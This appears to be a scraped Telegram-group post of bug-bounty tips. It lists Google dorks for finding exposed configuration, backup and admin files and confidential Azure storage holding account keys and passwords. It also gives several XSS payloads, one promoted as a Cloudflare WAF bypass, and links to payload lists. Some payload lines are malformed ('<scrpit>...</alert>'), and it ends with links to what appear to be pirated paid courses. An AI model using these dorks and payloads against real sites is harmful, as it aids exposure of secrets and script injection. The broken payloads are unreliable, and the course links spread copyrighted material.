Termux All Command [Telegram Group]

Google Dork : https://github.com/TakSec/google-dorks-bug-bounty/ https://taksec.github.io/google-dorks-bug-bounty/

Google Dork - High % keywords 🚀 inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com 🌐 site:example[.]com - Put your target domain here! 🔧 inurl:conf | inurl:env - Finds configuration and environment files. 🖥️ inurl:cgi | inurl:bin - Targets CGI scripts and binary directories. 🔒 inurl:etc | inurl:root - Looks for system-related directories. 📁 inurl:sql | inurl:backup - Searches for SQL databases or backup files. 🔑 inurl:admin | inurl:php - Finds admin areas or PHP files. ✂️ If you encounter false positives, filter them out using negative search: -www -careers -service

How CLickJacking Works

NET-Framework-3.5-Offline-Installer : https://github.com/T1M3-30M3/.NET-Framework-3.5-Offline-Installer

Sensitive Info DIsclouser : ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute” site:.

Got this cool payload 😎 <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

New Duplicate XSS in Hidden parameter to show hidden parameters command:- arjun -u http://example.com/test payload:- "><script>alert(1)</script>

Google Dork - API Endpoints 🔗 site:example.jcom inurl:api | site:*/rest | site:*/ v1 | site:*/v2 | site:*/v3 Find juicy API Endpoints for further testing.

New XSS Bypass Cloudflare WAF 🧱 Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

Azure OSINT Google Dork List - site:blob.core.windows.net “keyword” - site:"blob.core.windows.net" and intext:"CONFIDENTIAL" - site:*.core.windows.net intext:"TLP:RED" - site:*.core.windows.net - site:*.core.windows.net +blob - site:*.core.windows.net +files -web -blob - site:*.core.windows.net -web - site:*.core.windows.net -web -blob -files - site:*.core.windows.net inurl:dsts.dsts - site:*.core.windows.net inurl:"term" -web - site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username) - intext:connectionstring blob filetype:config - intext:accountkey windows.net filetype:xml - intext:storageaccountkey windows.net filetype:txt Please Share Across Your Network, Someone Might Really Be Looking For This. #Infosec #GHDB #Azure #bugbounty

Tool Name : Fast-Google-Dorks-Scan Github Link : https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan Description : The OSINT project, the main idea of which is to collect all the possible Google dorks search combinations and to find the information about the specific web-site: common admin panels, the widespread file types and path traversal. The 100% automated.

New XSS Bypass Cloudflare WAF 🧱 Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E #waf_bypass #cloudflare_bypass #xss #cf_bypass

🔥Mega Unlimited Courses 🔥 Enjoy for free💋👍❤️🙈📚 1.Alpha Batch ||Apna College https://mega.nz/folder/7c4DgCoR#drXYJCRySidQm3yasR09Sg 2. Arduino Java CPP SQL Ruby by NEWBIE https://mega.nz/folder/6pQDkQ6Z#mtiF9vmoiubjzefax1e6hw 3.Complete Data Science Course-1 https://mega.nz/folder/4QA1GBaB#9kXm7kx6c20VHzuv2QSvKA 4.Comlpete Data Science Course -2 https://mega.nz/folder/Y11ywDoR#Cpxs51cQfJqbiIMWFfU54A . Data Science - 3 https://mega.nz/folder/4QA1GBaB#9kXm7kx6c20VHzuv2QSvKA/folder/ZUwSUaQY 5.AWS by Naresh Sir https://drive.google.com/drive/folders/18h6kcVPH-wmkoAbQa_uMcL1KNNMzxl7S 6. AWS Folder -1 https://drive.google.com/drive/folders/14n1N0mMBhr3bsHwYwNs3MI5h51RlTk6F 7.React https://rb.gy/gcnjk https://drive.google.com/drive/folders/11HCB3JT6uK5mRlTZuvUGBQNzZ-iWSrNw 8.Durgasoft - Hibernate* https://mega.nz/folder/WKhwhQiQ#bqewS9rvSjDplGdXtPjS5w 9.CSE Made Easy https://mega.nz/folder/XmA3AIhR#NAAA1weJVen0vth8-6Wnag 10.GATE(complete course) by Ravindra Babu Ravula https://mega.nz/folder/OmhhyZTB#SkF6dphAxxOpOnGAvYDLaQ 11. CN intro to C++ https://mega.nz/folder/OKgySKzJ#KVkShmHRuX2lckMBhOpw4g/folder/LO400T4L 12.Abdul bari DSA C++* https://mega.nz/folder/L7AT1S4K#rpAyw8w9CKt9ntZdZmNJgw 13.Scaler academy DSA C++ https://mega.nz/folder/0YBnCIYD#pmuh5JOu9tDtHtdiTCvDUg 14.Angela yu web dev course https://mega.nz/folder/n8YDnIiA#E15euUFgJLURm_CxhrUKTQ 15.Unacademy GATE by Sanchit sir https://mega.nz/folder/XqAARBLb#pT2P9LL6uEqVkTO89qNHZw 16.Complete python course mega link https://mega.nz/folder/LcRChYSA#GmAFpruq-WJCKGrvAtSPpQ. 17. 100 Days Of Code - Web Development Bootcamp https://mega.nz/folder/YFpGAZ7S#Lz_blecK0n3YCywDIcpWEg 18.Complete React Native Course https://mega.nz/folder/UIBHiBTT#OZ1PvkseOzuxZkkbQFT9YQ https://mega.nz/folder/5BIiwSAC#fxL8mCU3kFfxr8Ag9ecg9A

XSS : <scrpit>alert(1)</alert> <scrpit>prompt(1)</alert> <scrpit>print()</alert> <scrpit>console.log("XSS")</alert> * XSS bruteForce by Burp Payload List: https://github.com/payloadbox/xss-payload-list https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txt https://github.com/Proviesec/xss-payload-list https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#bypass-csp-by-rhynorater